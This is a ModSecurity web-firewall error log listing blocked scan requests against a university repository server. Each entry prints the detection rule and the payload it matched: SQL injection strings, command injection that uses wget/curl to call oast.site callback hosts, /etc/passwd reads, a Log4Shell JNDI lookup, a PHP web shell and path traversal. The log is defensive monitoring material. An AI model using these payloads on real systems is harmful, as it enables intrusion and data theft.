[Tue Aug 29 11:34:29.438757 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATYeC8AAAAd"]
[Tue Aug 29 11:34:30.339469 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgk1mbmorwy8y5w.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATqf7IAAAAu"]
[Tue Aug 29 11:34:30.444271 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgfhu4imbw1kejf.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAASGMwsAAAAA"]
[Tue Aug 29 11:34:31.428471 2023] [:error] [pid 1228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATMStgAAAAB"]
[Tue Aug 29 11:34:32.327116 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAATmZccAAAAr"]
[Tue Aug 29 11:34:32.329723 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAATYeDIAAAAd"]
[Tue Aug 29 11:34:33.321746 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAATxvXYAAAAw"]
[Tue Aug 29 11:34:35.341752 2023] [:error] [pid 1251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAATjF30AAAAo"]
[Tue Aug 29 11:34:37.303794 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAATavt0AAAAg"]
[Tue Aug 29 11:34:38.322258 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlg4d1cftj5hk8sa.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAATmZcoAAAAr"]
[Tue Aug 29 11:34:38.328126 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgzy9yhjy4wbw67.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAAUZcEoAAABO"]
[Tue Aug 29 11:34:38.332114 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAAUbg0EAAABQ"]
[Tue Aug 29 11:34:41.325468 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAAUZcE0AAABO"]
[Tue Aug 29 11:34:42.339963 2023] [:error] [pid 1249] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAATh0AwAAAAm"]
[Tue Aug 29 11:34:44.299550 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAUIz7QAAABA"]
[Tue Aug 29 11:34:49.297640 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAAUXLisAAABM"]
[Tue Aug 29 11:34:49.312507 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAAUbg0wAAABQ"]
[Tue Aug 29 11:34:49.334599 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAAUTiXcAAABJ"]
[Tue Aug 29 11:34:49.336592 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAVJXj0AAAAA"]
[Tue Aug 29 11:34:51.578434 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAAUKhAAAAABC"]
[Tue Aug 29 11:34:51.936790 2023] [:error] [pid 1262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAATus1IAAAAv"]
[Tue Aug 29 11:34:52.311899 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAAQKOv8AAAAs"]
[Tue Aug 29 11:34:53.338160 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgjq6hcap5cwrkd.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATzVIcAAAAx"]
[Tue Aug 29 11:34:53.377552 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAASEJXsAAAAE"]
[Tue Aug 29 11:34:53.380479 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAATavuwAAAAg"]
[Tue Aug 29 11:34:55.308065 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAASPDMoAAAAS"]
[Tue Aug 29 11:34:56.345399 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAT2JQwAAAAz"]
[Tue Aug 29 11:34:56.348606 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAUDQTYAAAA7"]
[Tue Aug 29 11:34:57.314336 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ccCo-f0AAATUxRYAAAAW"]
[Tue Aug 29 11:34:57.329432 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAUOaUYAAABG"]
[Tue Aug 29 11:34:57.360355 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAASOUpkAAAAR"]
[Tue Aug 29 11:34:58.333306 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAATfd4IAAAAk"]
